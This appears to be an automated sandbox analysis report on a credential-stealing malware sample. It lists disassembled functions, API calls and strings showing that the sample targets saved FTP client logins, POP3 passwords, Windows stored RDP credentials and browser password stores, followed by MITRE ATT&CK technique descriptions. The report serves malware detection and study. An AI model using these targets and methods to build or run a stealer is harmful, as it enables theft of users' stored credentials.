Uniqueness

Uniqueness Score: -1.00%

Function 0040F9BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

756D19A0.OLE32(?,?), ref: 0040F9D6
StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?), ref: 0040FA2A

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

GlobalFix.KERNEL32(?), ref: 0040F9F7
GlobalUnWire.KERNEL32(?), ref: 0040FA0F

Strings

STATUS-IMPORT-OK, xrefs: 0040FA22

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Global$AllocLocalWire
String ID: STATUS-IMPORT-OK
API String ID: 1001023476-1591331578
Opcode ID: 3b79bee3aad427c17b5cbb5ec1259b4c648c36121bfd20428410bd6b7f9e2157
Instruction ID: 0345fb9e22b96943ae5b273897e63c39bffcc8a70edd58180d66b1a2d0bdc23e
Opcode Fuzzy Hash: 3b79bee3aad427c17b5cbb5ec1259b4c648c36121bfd20428410bd6b7f9e2157
Instruction Fuzzy Hash: A2015271E0020CBBCF11BBA6CC42ADE7B79AB01348F00817AB914B11A1DB7D9A909F58

Uniqueness

Uniqueness Score: -1.00%

Function 004023B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
Part of subcall function 00401D80: lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
Part of subcall function 00401D80: lstrcat.KERNEL32(00000000,?), ref: 00401DC8

lstrlen.KERNEL32(?,?,00000000), ref: 004023C7
StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 004023E6
StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023F8
lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040240A

Strings

.exe, xrefs: 004023E0

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: .exe
API String ID: 2414487701-4119554291
Opcode ID: eadaedbb1cfc7f83df8ada029020d54368334349577809477187e1cfe4a1502b
Instruction ID: 36a56975336c099ffd2d8b31021cc982b1ea5de44761deb063e6c4def44b5941
Opcode Fuzzy Hash: eadaedbb1cfc7f83df8ada029020d54368334349577809477187e1cfe4a1502b
Instruction Fuzzy Hash: C4F0A43120418169DB2122258D45B6FBE859B92794F240077F500AA2C2DBFC9892D2AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5A4 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

<POP3_Password2, xrefs: 0040E612

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: <POP3_Password2
API String ID: 0-2923094552
Opcode ID: f40e378ea3deaea659920f8b1a8c06c3522a4e58d0ba40cf07cf61ba3bea1e0d
Instruction ID: 85e2fa67560d9302a211698be468c48ee400464bf04242985954bf7aad8feac9
Opcode Fuzzy Hash: f40e378ea3deaea659920f8b1a8c06c3522a4e58d0ba40cf07cf61ba3bea1e0d
Instruction Fuzzy Hash: 9A414F32D00019EACF126FA2DC018EE7E75EF58354F144836F500B61B1D77A9E61EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCD5 Relevance: 7.6, APIs: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD05
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CD2B
StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD4F
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD71

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD5C

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: ByteCharLocalMultiWidelstrlen$AllocFree
String ID:
API String ID: 1890766102-0
Opcode ID: 578418fc7bcd325b5c328d84ee3871d199b7bb3c6e674be6750e99564a1c833b
Instruction ID: 950733df85081b8baef2ce3e821bd38e555ba366813178238e01664e0b4b5f12
Opcode Fuzzy Hash: 578418fc7bcd325b5c328d84ee3871d199b7bb3c6e674be6750e99564a1c833b
Instruction Fuzzy Hash: E4213E75904208FEEF116BA5CC46F9E7F65EF04314F20817AF214B91E1D6B95A90DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00405B2A Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(006B25B0,FTP Navigator), ref: 00405B58
StrStrIA.SHLWAPI(006B25B0,FTP Commander,006B25B0,FTP Navigator), ref: 00405B86

Part of subcall function 004023B3: lstrlen.KERNEL32(?,?,00000000), ref: 004023C7
Part of subcall function 004023B3: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 004023E6
Part of subcall function 004023B3: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023F8
Part of subcall function 004023B3: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040240A

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

FTP Navigator, xrefs: 00405B52
FTP Commander, xrefs: 00405B80
ftplist.txt, xrefs: 00405B6D, 00405B9B

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: FTP Commander$FTP Navigator$ftplist.txt
API String ID: 1884169789-2424314702
Opcode ID: b5105679f145d7d8e6eec2e0b52da286a011aa3134454faa6819a7f3f03d7e7a
Instruction ID: fe82fe6e90897ec5cd13b343a9372e5f1a85e7b3ceb16ddb2802c156e8cf4ffb
Opcode Fuzzy Hash: b5105679f145d7d8e6eec2e0b52da286a011aa3134454faa6819a7f3f03d7e7a
Instruction Fuzzy Hash: BC01A170500514BAD7127A318C02FEF3EAADB81394F24417BB941B11E6DABCBB8196AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF5A Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(006B2290,FTPNow), ref: 0040CF81
StrStrIA.SHLWAPI(006B2290,FTP Now,006B2290,FTPNow), ref: 0040CF92

Strings

FTPNow, xrefs: 0040CF7B
sites.xml, xrefs: 0040CFAB
FTP Now, xrefs: 0040CF8C

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: FTP Now$FTPNow$sites.xml
API String ID: 0-284577462
Opcode ID: 36e7f9c5659af322cc4604641f50b424a1c2f773f3706934a5ffef1e65d3d5b0
Instruction ID: 213c2a5bc47c119f791ab7f98c1af6563890b02d517a402ea43778fe9881e924
Opcode Fuzzy Hash: 36e7f9c5659af322cc4604641f50b424a1c2f773f3706934a5ffef1e65d3d5b0
Instruction Fuzzy Hash: 14F0F971604106F6DB113B308C82FAF7E675B82754F14023BB914B11E2EBBDC991935E

Uniqueness

Uniqueness Score: -1.00%

Function 004081FD Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,?,0000001B), ref: 00408355
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408376

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

=]A, xrefs: 004082C5
=]A, xrefs: 00408274

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$FreeLocal
String ID: =]A$=]A
API String ID: 2558778219-2356571529
Opcode ID: f5392809da4e97842b6c0a124a11a289fb2760198d93a2d6872ef86484b84526
Instruction ID: a07e87b81fbf63e1f7cd2b55d4491ea6016a46608c31ce1bd3c6608630a26919
Opcode Fuzzy Hash: f5392809da4e97842b6c0a124a11a289fb2760198d93a2d6872ef86484b84526
Instruction Fuzzy Hash: 19518C72900218AFDF10AEA5DC05BDE7BA5FB80354F14843AF950B72E1DBB99A41CA54

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C511
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C533
StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C547

Strings

Settings, xrefs: 0040C564

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$OpenStorage
String ID: Settings
API String ID: 2489594185-473154195
Opcode ID: a125fe5c6889891c2edec72a8b9da39d0711abbc8f6fd8be8313648f20cad14a
Instruction ID: 1412ce5b06427f1e7f2d1f9f269c5891ac56a43792e0d13f6f6fe7247e384bbc
Opcode Fuzzy Hash: a125fe5c6889891c2edec72a8b9da39d0711abbc8f6fd8be8313648f20cad14a
Instruction Fuzzy Hash: C931FB31A40119FBDF11AF91CC42F9EBB72EF04704F208166B611791F1D775AA60EB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040175D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

756D19A0.OLE32(?,?), ref: 0040176D
GlobalFix.KERNEL32(?), ref: 00401788

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

GlobalUnWire.KERNEL32(?), ref: 004017E6

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

PKDFILE0YUICRYPTED0YUI1.0, xrefs: 004017F5

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: GlobalLocal$AllocFreeWire
String ID: PKDFILE0YUICRYPTED0YUI1.0
API String ID: 3297799765-258907703
Opcode ID: 5e09e2bf95299194e7cdf3c8928cec3bfb1b3111da40aee99d994fb1cf1c5239
Instruction ID: c4d1b6a3fd02974b16804ec155f0a4c8182cffeec8d1a58f5097f2fdb6db5798
Opcode Fuzzy Hash: 5e09e2bf95299194e7cdf3c8928cec3bfb1b3111da40aee99d994fb1cf1c5239
Instruction Fuzzy Hash: 0221EC72D00109BBDF017FA1CC42AEE7E75EF10344F10817ABA15B51B1E77A9AA0AB59

Uniqueness

Uniqueness Score: -1.00%

Function 004084D2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

https://, xrefs: 00408538
http://, xrefs: 00408527

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: http://$https://
API String ID: 0-1916535328
Opcode ID: c4307a9287bec6a90849f8bf961f39c0404a1c8c24e60cd3e7331d5c173a9fc4
Instruction ID: 41ce756acc717e199ee392518a78b021118ff23315c0196b1d538706b8c3fa3f
Opcode Fuzzy Hash: c4307a9287bec6a90849f8bf961f39c0404a1c8c24e60cd3e7331d5c173a9fc4
Instruction Fuzzy Hash: 71410431800109FADF12AF91DE05BEE7B72AF00348F10807AB955391F1CB7A5BA0EB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401A74 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00401A7E
756D19A0.OLE32(?,?,?,?,0040FB71,?,?,?,?,het2563783920299393,?,?,?,?,?,?), ref: 00401A97
GlobalFix.KERNEL32(?), ref: 00401AB2

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

GlobalUnWire.KERNEL32(?), ref: 00401ADA

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: GlobalLocal$AllocCountFreeTickWire
String ID:
API String ID: 2192416133-0
Opcode ID: d9f248c6715539e0d7a973d98ddf4c427bdc0a4b663e31ea1848b9a53d8a9627
Instruction ID: ac97b9097a96585b02e242887629d9e56a2fc451f1bd220e0e1e9af6774a4305
Opcode Fuzzy Hash: d9f248c6715539e0d7a973d98ddf4c427bdc0a4b663e31ea1848b9a53d8a9627
Instruction Fuzzy Hash: 1521BB7190010CBEDF01AFE2CC429DDBB7AAF04348F0081BAB615B5171DB799BA5AB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB93 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: lstrlen.KERNEL32(00000000), ref: 0040155F

StrStrIA.SHLWAPI(?,004167D2,?,?,?,?,BEEF0000), ref: 0040CBD2
lstrlen.KERNEL32(TERMSRV/,?,004167D2,?,?,?,?,BEEF0000), ref: 0040CBE0
StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,004167D2,?,?,?,?,BEEF0000), ref: 0040CBF0

Strings

TERMSRV/, xrefs: 0040CBDB, 0040CBE8

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: TERMSRV/
API String ID: 1659193697-3001602198
Opcode ID: 3308349c2c745b9c98c75ff8abcedb94289f5204497221864e12c9f5c3b68721
Instruction ID: b543e856546b57c185fba9a240777293963b9a97424846c08820ecae6b6d1267
Opcode Fuzzy Hash: 3308349c2c745b9c98c75ff8abcedb94289f5204497221864e12c9f5c3b68721
Instruction Fuzzy Hash: 70116A31410109FBCF026F65CC429DE3F62AF54798F10853AB925751F1DB7ADAB1AB88

Uniqueness

Uniqueness Score: -1.00%

Function 00408FCB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00408FDE
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408FFF

Strings

nss3.dll, xrefs: 00409009

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CurrentDirectorylstrlen
String ID: nss3.dll
API String ID: 2713697268-2492180550
Opcode ID: 2704a775cf98d981e9e5d31d1997e689d11d62f77da8a69e01f38d93aee08f7f
Instruction ID: bb59387fe3b84fef708d5d902a87d96e659b25fa5f879baa748375427f6edae3
Opcode Fuzzy Hash: 2704a775cf98d981e9e5d31d1997e689d11d62f77da8a69e01f38d93aee08f7f
Instruction Fuzzy Hash: 21118470900115DBDB106F34EC49BDA7FA1BB48348F108036F806B42E2E7B98995DA4E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CC83
CredFree.ADVAPI32(00000000), ref: 0040CCCA

Strings

TERMSRV/*, xrefs: 0040CC7E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Cred$EnumerateFree
String ID: TERMSRV/*
API String ID: 3403564193-275249402
Opcode ID: 7754422b856914a7ef7ea4e0f41e5edee12a2a7f001b95978b4fbc810bcf661c
Instruction ID: bf1fb700776914984d8e825650e55169ba0e85d0ae4d6ead4279b935a8f1250c
Opcode Fuzzy Hash: 7754422b856914a7ef7ea4e0f41e5edee12a2a7f001b95978b4fbc810bcf661c
Instruction Fuzzy Hash: 5B112131408208EBEF318F98D989BDEB7B5EB04315F14427BD545722E0D379AE84EB99

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

